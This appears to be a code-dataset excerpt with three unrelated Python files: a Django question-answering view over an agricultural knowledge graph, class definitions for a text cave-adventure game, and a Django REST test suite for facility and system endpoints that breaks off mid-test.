text stringlengths 957 885k |
|---|
#-*- coding:utf-8 _*-
"""
@author:charlesXu
@file: question_answering.py
@desc: 问答实现
@time: 2019/01/26
"""
import random
import re
from django.shortcuts import render
from Chatbot_KG.toolkit.pre_load import pre_load_thu
from Chatbot_KG.toolkit.pre_load import neo_con
city_list = []
filePath = 'F:\project\Agriculture_KnowledgeGraph\demo\label_data\city_list.txt'
with open(filePath, 'r', encoding='utf8') as fr:
for city in fr.readlines():
city_list.append(city.strip())
thu_lac = pre_load_thu
db = neo_con
#得到(address -(中文名) -> ? )
def get_chinese_name(address):
address_chinese_name = db.findOtherEntities(address,"中文名")
if(len(address_chinese_name) == 0):
return 0
else:
address_chinese_name = address_chinese_name[0]['n2']['title']
return address_chinese_name
#得到(? <- (中文名) - address)
def get_chinese_name2(address):
address_chinese_name = db.findOtherEntities2(address,"中文名")
if(len(address_chinese_name) == 0):
return 0
else:
address_chinese_name = address_chinese_name[0]['n1']['title']
return address_chinese_name
#得到address具体的行政级别
def get_xinghzhengjibie(address):
xingzhengjibie = db.findOtherEntities(address,"行政类别")
if(len(xingzhengjibie) > 0 ):
xingzhengjibie = xingzhengjibie[0]['n2']['title']
return xingzhengjibie
return 0
#得到address的天气
def get_city_weather(address):
weather = db.findOtherEntities(address,"气候")
if(len(weather) > 0):
return weather[0]['n2']['title']
return 0
#找到对应天气适合种植的植物,随机取6个,如果植物里有科,那么找到这个科具体对应的植物,最多随机取6个,将答案和关系填在ret_dict中
def get_weather_plant(weather,ret_dict):
plant = db.findOtherEntities(weather,"适合种植")
#如果结果数大于6,则随机取6个
selected_index = []
if(len(plant) > 6 ):
m = 6
for i in range(len(plant)):
rand = random.randint(0,len(plant) - i - 1)
if(rand<m):
m-=1
selected_index.append(i)
else:
selected_index = [i for i in range(len(plant))]
for i in selected_index:
selected_plant = plant[i]['n2']['title']
relation = plant[i]['rel']['type']
if(selected_plant[-1] == "科"):
concrete_plant_list = db.findOtherEntities2(selected_plant,"科")
selected_concrete_index = []
if(len(concrete_plant_list) >6 ):
m = 6
for j in range(len(concrete_plant_list)):
rand = random.randint(0,len(concrete_plant_list) - j - 1)
if(rand < m):
m-=1
selected_concrete_index.append(j)
else:
selected_concrete_index = [i for i in range(len(concrete_plant_list))]
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({"entity1":weather,"rel":"适合种植","entity2":selected_plant,"entity1_type":"气候","entity2_type":"植物"})
for j in selected_concrete_index:
concrete_plant = concrete_plant_list[j]['n1']['title']
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({"entity1":concrete_plant,"rel":"科","entity2":selected_plant,"entity1_type":"植物科","entity2_type":"植物"})
if(ret_dict.get('answer') is None):
ret_dict['answer'] = [concrete_plant]
else:
ret_dict['answer'].append(concrete_plant)
else:
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({"entity1":weather,"rel":"适合种植","entity2":selected_plant,"entity1_type":"气候","entity2_type":"植物"})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [selected_plant]
else:
ret_dict['answer'].append(selected_plant)
return ret_dict
#得到县、市辖区所属的市
def get_shi_address(address):
upper_address = db.findOtherEntities(address,"located in the administrative territorial entity")
if(len(upper_address) == 0):
address = get_chinese_name(address)
upper_address = db.findOtherEntities(address,"located in the administrative territorial entity")
if(len(upper_address) ==0 ):
return 0
upper_address = upper_address[0]['n2']['title']
return upper_address
#得到答案
def get_shi_plant(address,ret_dict):
if (address in city_list):
# 查看weather
weather = get_city_weather(address)
if (weather != 0):
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({'entity1': address, 'rel': '气候', 'entity2': weather,'entity1_type':'地点','entity2_type':'气候'})
# 得到当前weather适合种植的植物,随机6种,少于6种则全部输出
ret_dict = get_weather_plant(weather, ret_dict)
else:
address_chinese_name = get_chinese_name(address)
if (address_chinese_name in city_list):
weather = get_city_weather(address_chinese_name)
if (weather != 0):
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({'entity1': address_chinese_name, 'rel': '气候', 'entity2': weather,'entity1_type':'地点','entity2_type':'气候'})
ret_dict = get_weather_plant(address_chinese_name, ret_dict)
return ret_dict
def get_shi_weather(address,ret_dict):
if (address in city_list):
# 查看weather
weather = get_city_weather(address)
if (weather != 0):
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({'entity1': address, 'rel': '气候', 'entity2': weather,'entity1_type':'地点','entity2_type':'气候'})
if(ret_dict.get('answer') is None):
ret_dict['answer'] = [weather]
else:
ret_dict['answer'].append(weather)
else:
address_chinese_name = get_chinese_name(address)
if (address_chinese_name in city_list):
weather = get_city_weather(address_chinese_name)
if (weather != 0):
if(ret_dict.get('list') is None):
ret_dict['list'] = []
ret_dict['list'].append({'entity1': address, 'rel': '气候', 'entity2': weather,'entity1_type':'地点','entity2_type':'气候'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [weather]
else:
ret_dict['answer'].append(weather)
return ret_dict
def get_xian_plant(address,ret_dict):
upper_address = get_shi_address(address)
if (upper_address in city_list):
ret_dict = get_shi_plant(upper_address, ret_dict)
else:
upper_address_chinese_name = get_chinese_name2(upper_address)
if (upper_address_chinese_name == 0):
upper_address_chinese_name = get_chinese_name(upper_address)
ret_dict = get_shi_plant(upper_address_chinese_name, ret_dict)
return ret_dict
def get_xian_weather(address,ret_dict):
upper_address = get_shi_address(address)
if (upper_address in city_list):
ret_dict = get_shi_weather(upper_address, ret_dict)
else:
upper_address_chinese_name = get_chinese_name2(upper_address)
if (upper_address_chinese_name == 0):
upper_address_chinese_name = get_chinese_name(upper_address)
ret_dict = get_shi_weather(upper_address_chinese_name, ret_dict)
return ret_dict
def get_xian_address(address):
upper_address = db.findOtherEntities2(address,"contains administrative territorial entity")
if(len(upper_address) == 0):
return 0
return upper_address[0]['n1']['title']
def get_nutrition(obj,ret_dict):
nutrition = db.findOtherEntities(obj,"营养成分")
if(len(nutrition) > 0 ):
#结果数大于6则随机取6个
if(len(nutrition) > 6):
selected_index = []
n = len(nutrition)
m = 6
for i in range(n):
rand = random.randint(0, n - i - 1)
if(rand<m):
m -= 1
selected_index.append(i)
else:
selected_index = [i for i in range(len(nutrition))]
for index in selected_index:
x = nutrition[index]['n2']['title']
if(ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1':obj,'rel':'含有','entity2':x,'entity1_type':'主语','entity2_type':'元素'}]
else:
ret_dict['list'].append({'entity1':obj,'rel':'含有','entity2':x,'entity1_type':'主语','entity2_type':'元素'})
if(ret_dict.get('answer') is None):
ret_dict['answer'] = [x]
else:
ret_dict['answer'].append(x)
return ret_dict
def get_plant_knowledge(obj,ret_dict):
ke = db.findOtherEntities(obj,"科")
if(len(ke) > 0 ):
if(ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1':obj,'rel':'科','entity2':ke[0]['n2']['title'],'entity1_type':'植物','entity2_type':'类型'}]
else:
ret_dict['list'].append({'entity1': obj, 'rel': '科', 'entity2': ke[0]['n2']['title'],'entity1_type':'植物','entity2_type':'类型'})
if(ret_dict.get('answer') is None):
ret_dict['answer'] = [ke[0]['n2']['title']]
else:
ret_dict['answer'].append(ke[0]['n2']['title'])
shu = db.findOtherEntities(obj,"属")
if(len(shu) > 0 ):
if(ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1':obj,'rel':'属','entity2':shu[0]['n2']['title'],'entity1_type':'植物','entity2_type':'类型'}]
else:
ret_dict['list'].append({'entity1': obj, 'rel': '属', 'entity2': shu[0]['n2']['title'],'entity1_type':'植物','entity2_type':'类型'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [shu[0]['n2']['title']]
else:
ret_dict['answer'].append(shu[0]['n2']['title'])
men = db.findOtherEntities(obj, "门")
if (len(men) > 0):
if (ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1': obj, 'rel': '门', 'entity2': men[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'}]
else:
ret_dict['list'].append({'entity1': obj, 'rel': '门', 'entity2': men[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [men[0]['n2']['title']]
else:
ret_dict['answer'].append(men[0]['n2']['title'])
gang = db.findOtherEntities(obj, "纲")
if (len(gang) > 0):
if (ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1': obj, 'rel': '纲', 'entity2': gang[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'}]
else:
ret_dict['list'].append({'entity1': obj, 'rel': '纲', 'entity2': gang[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [gang[0]['n2']['title']]
else:
ret_dict['answer'].append(gang[0]['n2']['title'])
mu = db.findOtherEntities(obj, "目")
if (len(mu) > 0):
if (ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1': obj, 'rel': '目', 'entity2': mu[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'}]
else:
ret_dict['list'].append({'entity1': obj, 'rel': '目', 'entity2': mu[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [mu[0]['n2']['title']]
else:
ret_dict['answer'].append(mu[0]['n2']['title'])
yamu = db.findOtherEntities(obj, "亚目")
if (len(yamu) > 0):
if (ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1': obj, 'rel': '亚目', 'entity2': yamu[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'}]
else:
ret_dict['list'].append({'entity1': obj, 'rel': '亚目', 'entity2': yamu[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [yamu[0]['n2']['title']]
else:
ret_dict['answer'].append(yamu[0]['n2']['title'])
yake = db.findOtherEntities(obj, "亚科")
if (len(yake) > 0):
if (ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1': obj, 'rel': '亚科', 'entity2': yake[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'}]
else:
ret_dict['list'].append(
{'entity1': obj, 'rel': '亚科', 'entity2': yake[0]['n2']['title'], 'entity1_type': '植物',
'entity2_type': '类型'})
if (ret_dict.get('answer') is None):
ret_dict['answer'] = [yake[0]['n2']['title']]
else:
ret_dict['answer'].append(yake[0]['n2']['title'])
return ret_dict
pattern = [[r"适合种什么",r"种什么好"],
[r"气候是什么","气候类型是什么",r"属于哪种气候",r"是哪种气候",r"是什么天气",r"哪种天气",r"天气[\u4e00-\u9fa5]*"],
[r"有哪些营养",r"有[\u4e00-\u9fa5]+成分",r"含[\u4e00-\u9fa5]+成分",r"含[\u4e00-\u9fa5]+元素",r"有[\u4e00-\u9fa5]+营养",r"有[\u4e00-\u9fa5]+元素"],
[r"[\u4e00-\u9fa5]+植物学",r"[\u4e00-\u9fa5]+知识"]]
def question_answering(request): # index页面需要一开始就加载的内容写在这里
context = {'ctx':''}
if(request.GET):
question = request.GET['question']
cut_statement = thu_lac.cut(question,text=False)
print(cut_statement)
address_name = []
weather_name = []
question_name = ""
ret_dict = {}
pos = -1
q_type = -1
for i in range(len(pattern)):
for x in pattern[i]:
index = re.search(x,question)
if(index):
pos = index.span()[0]
q_type= i
break
if(pos!=-1):
break
print(pos)
#匹配问题 xxx地方适合种什么
if(q_type==0):
index = 0
for x in cut_statement:
if(index>pos):
break
index += len(x)
if (x[1] == 'ns' or (
x[1] == 'n' and (x[0][-1] == '镇' or x[0][-1] == '区' or x[0][-1] == '县' or x[0][-1] == '市'))):
address_name.append(x[0])
elif (x[0] == '崇明'):
address_name.append(x[0])
for address in address_name:
address = address.strip()
##查看行政级别,如果没有行政级别这个属性,使用(address <- 中文名)再试一次,如果还没有行政级别这个属性,那么默认是镇
xingzhengjibie = get_xinghzhengjibie(address)
address_chinese_name = 0
if(xingzhengjibie == 0):
address_chinese_name = get_chinese_name2(address)
if(address_chinese_name ==0):
address_chinese_name = get_chinese_name(address)
if(xingzhengjibie == 0 and address_chinese_name == 0):
xingzhengjibie = '镇'
elif(xingzhengjibie ==0 ):
xingzhengjibie = get_xinghzhengjibie(address_chinese_name)
if(xingzhengjibie == 0):
xingzhengjibie = '镇'
print(xingzhengjibie)
#如果行政级别是市或者地级市,那么直接看该address是否在city_list中,如果不在,再看它的chinese_name在不在
if(xingzhengjibie == "市" or xingzhengjibie == "地级市" or xingzhengjibie =='直辖市'):
ret_dict = get_shi_plant(address,ret_dict)
elif(xingzhengjibie == "县" or xingzhengjibie == "市辖区"):
if(len(ret_dict) == 0 or ret_dict==0):
ret_dict = get_xian_plant(address,ret_dict)
if (len(ret_dict) > 0):
upper_address = get_shi_address(address)
ret_dict['list'].append({'entity1': address, 'rel': '属于', 'entity2': upper_address,'entity1_type':'地点','entity2_type':'地点'})
elif(xingzhengjibie == "镇"):
upper_address = get_xian_address(address)
if(len(ret_dict) == 0 and upper_address!=0):
ret_dict = get_xian_plant(upper_address,ret_dict)
if(len(ret_dict) >0 ):
ret_dict['list'].append({'entity1':address,'rel':'属于','entity2':upper_address,'entity1_type':'地点','entity2_type':'地点'})
##匹配问题:属于哪种气候
if(q_type == 1):
index = 0
flag = 0
for x in cut_statement:
if(index > pos):
break
index += len(x)
if (x[1] == 'ns' or (x[1] == 'n' and (x[0][-1] == '镇' or x[0][-1] == '区' or x[0][-1] == '县' or x[0][-1] == '市'))):
address_name.append(x[0])
elif (x[0] == '崇明'):
address_name.append(x[0])
elif(x[0] == '首都' or x[0] == '首府'):
flag = 1
for address in address_name:
print(flag)
if(flag == 1):
shoudu = db.findOtherEntities(address, "首都")
if(len(shoudu) >0):
shoudu = shoudu[0]['n2']['title']
if(ret_dict.get('list') is None):
ret_dict['list'] = [{'entity1':address,'rel':'首都','entity2':shoudu,'entity1_type':'地点','entity2_type':'地点'}]
address = shoudu
address = address.strip()
print(address)
##查看行政级别,如果没有行政级别这个属性,使用(address <- 中文名)再试一次,如果还没有行政级别这个属性,那么默认是镇
xingzhengjibie = get_xinghzhengjibie(address)
address_chinese_name = 0
if (xingzhengjibie == 0):
address_chinese_name = get_chinese_name2(address)
if (address_chinese_name == 0):
address_chinese_name = get_chinese_name(address)
if (xingzhengjibie == 0 and address_chinese_name == 0):
xingzhengjibie = '镇'
elif (xingzhengjibie == 0):
xingzhengjibie = get_xinghzhengjibie(address_chinese_name)
if (xingzhengjibie == 0):
xingzhengjibie = '镇'
print(xingzhengjibie)
# 如果行政级别是市或者地级市,那么直接看该address是否在city_list中,如果不在,再看它的chinese_name在不在
if (xingzhengjibie == "市" or xingzhengjibie == "地级市" or xingzhengjibie == '直辖市'):
ret_dict = get_shi_weather(address, ret_dict)
elif (xingzhengjibie == "县" or xingzhengjibie == "市辖区"):
if (len(ret_dict) == 0 or ret_dict ==0):
ret_dict = get_xian_weather(address, ret_dict)
if (len(ret_dict) > 0 and ret_dict!=0):
upper_address = get_shi_address(address)
ret_dict['list'].append(
{'entity1': address, 'rel': '属于', 'entity2': upper_address, 'entity1_type': '地点',
'entity2_type': '地点'})
elif (xingzhengjibie == "镇"):
upper_address = get_xian_address(address)
if (len(ret_dict) == 0 or ret_dict ==0):
ret_dict = get_xian_weather(upper_address, ret_dict)
if (len(ret_dict) > 0 and ret_dict!=0):
ret_dict['list'].append(
{'entity1': address, 'rel': '属于', 'entity2': upper_address, 'entity1_type': '地点',
'entity2_type': '地点'})
#匹配问题,有什么营养元素
zhuyu = ""
if(q_type == 2):
index = 0
for x in cut_statement:
if(index > pos):
break
index += len(x)
if(x[1] == 'n'):
zhuyu = zhuyu+x[0]
if(len(zhuyu)>0):
ret_dict = get_nutrition(zhuyu,ret_dict)
#匹配问题,植物学知识
zhuyu = ""
if(q_type == 3):
index = 0
for x in cut_statement:
if(index>pos):
break
index += len(x)
if(x[1] == 'n'):
zhuyu = zhuyu+x[0]
if(len(zhuyu)>0):
ret_dict = get_plant_knowledge(zhuyu,ret_dict)
print(ret_dict)
if(len(ret_dict)!=0 and ret_dict!=0):
return render(request,'qa/question_answering.html',{'ret':ret_dict})
print(context)
return render(request, 'qa/question_answering.html', {'ctx':'暂未找到答案'})
return render(request, 'qa/question_answering.html', context) |
# This is where the classes and objects are defined
import random
class Game:
def __init__(self, difficulty, length, cave_map):
self.cave_map = cave_map
self.difficulty = difficulty
self.length = length
class Condition:
def __init__(self, name, damage, ac_reduction, duration):
self.name = name
self.damage = damage
self.ac_reduction = ac_reduction
self.duration = duration
poisoned = Condition(name='poisoned', damage=1, duration=0, ac_reduction=0)
hobbled = Condition(name='hobbled', damage=0, duration=1, ac_reduction=0) # not implemented
blind = Condition(name='blind', damage=0, duration=1, ac_reduction=-4) # not implemented
conditions = [poisoned, hobbled, blind]
class Weapon:
def __init__(self, name, attack_bonus, damage, value, apply_condition):
self.name = name
self.attack_bonus = attack_bonus
self.damage = damage
self.value = value
self.apply_condition = apply_condition
unarmed = Weapon(name='fists', attack_bonus=0, damage=1, value=0, apply_condition=0)
rusty_dagger = Weapon(name='rusty dagger', attack_bonus=0, damage=2, value=50, apply_condition=0)
steel_sword = Weapon(name='steel sword', attack_bonus=1, damage=4, value=200, apply_condition=0)
bow = Weapon(name='bow', attack_bonus=4, damage=3, value=300, apply_condition=0)
poisoned_fangs = Weapon(name='poisoned fangs', attack_bonus=2, damage=1, value=0, apply_condition=poisoned)
wand = Weapon(name='wand', attack_bonus=5, damage=5, value=400, apply_condition=0)
weapons = [unarmed, rusty_dagger, steel_sword, bow, poisoned_fangs, wand]
class Enemy:
def __init__(self, name, max_hp, hp, ac, attack, weapon, xp_worth):
self.name = name
self.max_hp = max_hp
self.hp = hp
self.ac = ac
self.attack = attack
self.weapon = weapon
self.xp_worth = xp_worth
goblin = Enemy(name="Goblin", max_hp=4, hp=4, ac=12, attack=4, weapon=rusty_dagger, xp_worth=1)
goblin_champion = Enemy(name="<NAME>", max_hp=6, hp=6, ac=14, attack=4, weapon=steel_sword, xp_worth=3)
kobold_archer = Enemy(name="<NAME>", max_hp=3, hp=3, ac=10, attack=6, weapon=bow, xp_worth=2)
spider = Enemy(name="Spider", max_hp=3, hp=3, ac=11, attack=5, weapon=poisoned_fangs, xp_worth=3)
enemy_types = [goblin, goblin_champion, kobold_archer, spider]
class PlayerCharacter:
def __init__(self, max_hp, hp, ac, attack, weapon, xp, level, location, condition, class_, killed):
self.max_hp = max_hp
self.hp = hp
self.ac = ac
self.attack = attack
self.weapon = weapon
self.xp = xp
self.level = level
self.location = location
self.condition = condition
self.class_ = class_
self.killed = killed
def sheet(self):
print(f'######################################')
print(f'# {self.class_} HP {self.hp}/{self.max_hp} AC {self.ac} ATT {self.attack} XP {self.xp}')
print(f'# {self.weapon.name.capitalize()} equipped DMG {self.weapon.damage} ATT {self.weapon.attack_bonus}')
print(f'# Enemies killed {self.killed}')
if self.condition != 0:
print(f'# {self.condition.name} ')
print(f'######################################')
print('')
ranger = PlayerCharacter(max_hp=8, hp=8, ac=12, attack=1, weapon=bow, xp=0, level=1,
location=None, condition=0, class_='Ranger', killed=0)
fighter = PlayerCharacter(max_hp=10, hp=10, ac=14, attack=2, weapon=steel_sword, xp=0, level=1,
location=None, condition=0, class_='Fighter', killed=0)
wizard = PlayerCharacter(max_hp=7, hp=7, ac=10, attack=5, weapon=wand, xp=0, level=0,
location=None, condition=0, class_='Wizard', killed=0)
player_classes = [ranger, fighter, wizard]
class Tile:
def __init__(self, ways_out, trap_type, text_description, enemy, link0, link1, link2, link3, visited, start_tile):
self.ways_out = ways_out
self.trap_type = trap_type
self.text_description = text_description
self.enemy = enemy
self.link0 = link0 # link to back/previous tile
self.link1 = link1 # link to next tile left if 1 or 3 ways out
self.link2 = link2 # link to next tile forward if 1 or 3 ways out
self.link3 = link3 # link to next tile right if 3 ways out
self.visited = visited
self.start_tile = start_tile
cave_word1 = ['a dimly lit', 'an ominously dark', 'an eerily quiet',
'an uncomfortably cold', 'a horribly humid']
cave_word2 = ['corridor', 'spot', 'room', 'cavern']
cave_word3 = ['with damp walls', 'with a slippery floor', 'traversed by a snaking creek']
def cave_description():
description = random.choice(cave_word1) + " " + random.choice(cave_word2) + " " + random.choice(cave_word3)
return description
|
<reponame>savannahghi/mle
"""Test for the common views."""
import random
import shutil
import uuid
from functools import partial
from os import path
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import TestCase
from django.urls import reverse
from faker import Faker
from model_bakery import baker
from model_bakery.recipe import Recipe
from rest_framework import status
from rest_framework.test import APITestCase
from fahari.common.constants import WHITELIST_COUNTIES
from fahari.common.models import Facility, Organisation, System, UserFacilityAllotment
from .test_utils import patch_baker
DIR_PATH = path.join(path.dirname(path.abspath(__file__)))
MEDIA_PATH = path.join(DIR_PATH, "media")
http_origin_header = {"HTTP_ORIGIN": "http://sil.com"}
fake = Faker()
def delete_media_file():
"""Delete the media folder after tests."""
if path.exists(MEDIA_PATH):
shutil.rmtree(MEDIA_PATH)
def global_organisation():
"""Create organisation for running test."""
org_id = "ebef581c-494b-4772-9e49-0b0755c44e61"
code = 50
organisation_name = "Demo Hospital"
try:
return Organisation.objects.get(
id=org_id,
code=code,
organisation_name=organisation_name,
)
except Organisation.DoesNotExist:
return baker.make(
Organisation,
id=org_id,
organisation_name=organisation_name,
code=code,
)
class LoggedInMixin(APITestCase):
"""Define a logged in session for use in tests."""
def setUp(self):
"""Create a test user for the logged in session."""
super(LoggedInMixin, self).setUp()
username = str(uuid.uuid4())
self.user = get_user_model().objects.create_superuser(
email=fake.email(),
password="<PASSWORD>",
username=username,
)
all_perms = Permission.objects.all()
for perm in all_perms:
self.user.user_permissions.add(perm)
self.user.organisation = self.global_organisation
self.user.save()
# Allot the given users to all the facilities in FYJ counties
self.user_facility_allotment = baker.make(
UserFacilityAllotment,
allotment_type=UserFacilityAllotment.AllotmentType.BY_REGION.value,
counties=WHITELIST_COUNTIES,
organisation=self.global_organisation,
region_type=UserFacilityAllotment.RegionType.COUNTY.value,
user=self.user,
)
assert self.client.login(username=username, password="<PASSWORD>") is True
self.patch_organisation = partial(
patch_baker, values={"organisation": self.global_organisation}
)
self.org_patcher = self.patch_organisation()
self.org_patcher.start()
self.addCleanup(self.org_patcher.stop)
headers = self.extra_headers()
self.client.get = partial(self.client.get, **headers)
self.client.patch = partial(self.client.patch, **headers)
self.client.post = partial(self.client.post, **headers)
@property
def global_organisation(self):
"""Create test organisation for the user."""
return global_organisation()
def make_recipe(self, model, **kwargs):
"""Ensure test user part of an organisation."""
if "organisation" not in kwargs:
kwargs["organisation"] = self.user.organisation
return Recipe(model, **kwargs)
def extra_headers(self):
"""Return an empty headers list."""
return {}
class DRFSerializerExcelIOMixinTest(LoggedInMixin, APITestCase):
"""Test suite for excel io mixin API."""
def setUp(self) -> None:
super().setUp()
from fahari.ops.models import FacilitySystem
from fahari.ops.serializers import FacilitySystemSerializer
versions = baker.make(FacilitySystem, 10, organisation=self.global_organisation)
self.data = FacilitySystemSerializer(versions, many=True).data
def test_dump_data(self) -> None:
"""Test `dump_data` action."""
url = reverse("api:facilitysystem-dump-data")
data = {"dump_fields": ["facility_data::name", "system_data::name", "version"]}
response = self.client.get(url, data=data)
assert response.status_code == status.HTTP_200_OK
assert response["content-disposition"] == "attachment; filename=facility systems.xlsx"
assert response["content-type"] == "application/xlsx; charset=utf-8"
def test_get_available_fields(self) -> None:
"""Test the `get_available_fields` action."""
url = reverse("api:facilitysystem-get-available-fields")
response = self.client.get(url)
assert response.status_code == status.HTTP_200_OK, response.json()
assert len(response.data) == 1
assert response.data[0]["id"] == "*"
def test_get_filter_form(self) -> None:
"""Test the `get_filter_form` action."""
url = reverse("api:facilitysystem-get-filter-form")
response = self.client.get(url)
assert response.status_code == status.HTTP_200_OK
assert response["content-type"] == "text/html; charset=utf-8"
class FacilityViewsetTest(LoggedInMixin, APITestCase):
"""Test suite for facilities API."""
def setUp(self):
self.url_list = reverse("api:facility-list")
super().setUp()
def test_create_facility(self):
"""Test add facility."""
data = {
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
"organisation": self.global_organisation.pk,
}
response = self.client.post(self.url_list, data)
assert response.status_code == 201, response.json()
assert response.data["mfl_code"] == data["mfl_code"]
def test_create_facility_no_organisation(self):
"""Test add facility."""
data = {
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
# the user's organisation is used
}
response = self.client.post(self.url_list, data)
assert response.status_code == 201, response.json()
assert response.data["mfl_code"] == data["mfl_code"]
def test_create_facility_error_supplied_id(self):
"""Test add facility."""
data = {
"id": uuid.uuid4(),
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
"organisation": self.global_organisation.pk,
}
response = self.client.post(self.url_list, data)
assert response.status_code == 400, response.json()
assert (
"You are not allowed to pass object with an id" in response.json()["id"]
), response.json()
def test_create_facility_error_bad_organisation(self):
"""Test add facility."""
data = {
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
"organisation": uuid.uuid4(), # does not exist
}
response = self.client.post(self.url_list, data)
assert response.status_code == 400, response.json()
assert "Ensure the organisation provided exists." in response.json()["organisation"]
def test_retrieve_facility(self):
"""Test retrieving facility."""
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
operation_status="Operational",
organisation=self.global_organisation,
)
response = self.client.get(self.url_list)
assert response.status_code == 200, response.json()
assert response.data["count"] >= 1, response.json()
facility_codes = [a["mfl_code"] for a in response.data["results"]]
assert facility.mfl_code in facility_codes
def test_retrieve_facility_with_fields(self):
"""Test retrieving facility."""
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
operation_status="Operational",
organisation=self.global_organisation,
)
# updated and other audit fields are popped and not returned
url = f"{self.url_list}?fields=id,name,mfl_code,"
"updated,created,updated_by,created_by,organisation"
response = self.client.get(url)
assert response.status_code == 200, response.json()
assert response.data["count"] >= 1, response.json()
facility_codes = [a["mfl_code"] for a in response.data["results"]]
assert facility.mfl_code in facility_codes
def test_retrieve_facility_with_combobox(self):
"""Test retrieving facility."""
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
operation_status="Operational",
organisation=self.global_organisation,
)
url = f"{self.url_list}?combobox={facility.pk}"
response = self.client.get(url)
assert response.status_code == 200, response.json()
assert response.data["count"] >= 1, response.json()
facility_codes = [a["mfl_code"] for a in response.data["results"]]
assert facility.mfl_code in facility_codes
def test_retrieve_facility_active(self):
"""Test retrieving facility."""
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
operation_status="Operational",
organisation=self.global_organisation,
)
url = f"{self.url_list}?active=True"
response = self.client.get(url)
assert response.status_code == 200, response.json()
assert response.data["count"] >= 1, response.json()
facility_codes = [a["mfl_code"] for a in response.data["results"]]
assert facility.mfl_code in facility_codes
def test_patch_facility(self):
"""Test changing user facility."""
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
organisation=self.global_organisation,
)
edit_code = {"mfl_code": 999999999}
url = reverse("api:facility-detail", kwargs={"pk": facility.pk})
response = self.client.patch(url, edit_code)
assert response.status_code == 200, response.json()
assert response.data["mfl_code"] == edit_code["mfl_code"]
def test_put_facility(self):
"""Test changing user and add new facility."""
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
organisation=self.global_organisation,
)
data = {
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
"organisation": self.global_organisation.pk,
}
url = reverse("api:facility-detail", kwargs={"pk": facility.pk})
response = self.client.put(url, data)
assert response.status_code == 200, response.json()
assert response.data["mfl_code"] == data["mfl_code"]
class FacilityFormTest(LoggedInMixin, TestCase):
def test_create(self):
data = {
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
"lon": 0.0,
"lat": 0.0,
"organisation": self.global_organisation.pk,
}
response = self.client.post(reverse("common:facility_create"), data=data)
self.assertEqual(
response.status_code,
302,
)
def test_update(self):
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
organisation=self.global_organisation,
)
data = {
"pk": facility.pk,
"name": fake.name(),
"mfl_code": random.randint(1, 999_999_999),
"county": random.choice(WHITELIST_COUNTIES),
"is_fahari_facility": True,
"operation_status": "Operational",
"lon": 0.0,
"lat": 0.0,
"organisation": self.global_organisation.pk,
}
response = self.client.post(
reverse("common:facility_update", kwargs={"pk": facility.pk}), data=data
)
self.assertEqual(
response.status_code,
302,
)
def test_delete(self):
facility = baker.make(
Facility,
is_fahari_facility=True,
county=random.choice(WHITELIST_COUNTIES),
organisation=self.global_organisation,
)
response = self.client.post(
reverse("common:facility_delete", kwargs={"pk": facility.pk}),
)
self.assertEqual(
response.status_code,
302,
)
class SystemViewsetTest(LoggedInMixin, APITestCase):
"""Test suite for systems API."""
def setUp(self):
self.url_list = reverse("api:system-list")
super().setUp()
def test_create(self):
data = {
"name": fake.name()[:127],
"description": fake.text(),
"organisation": self.global_organisation.pk,
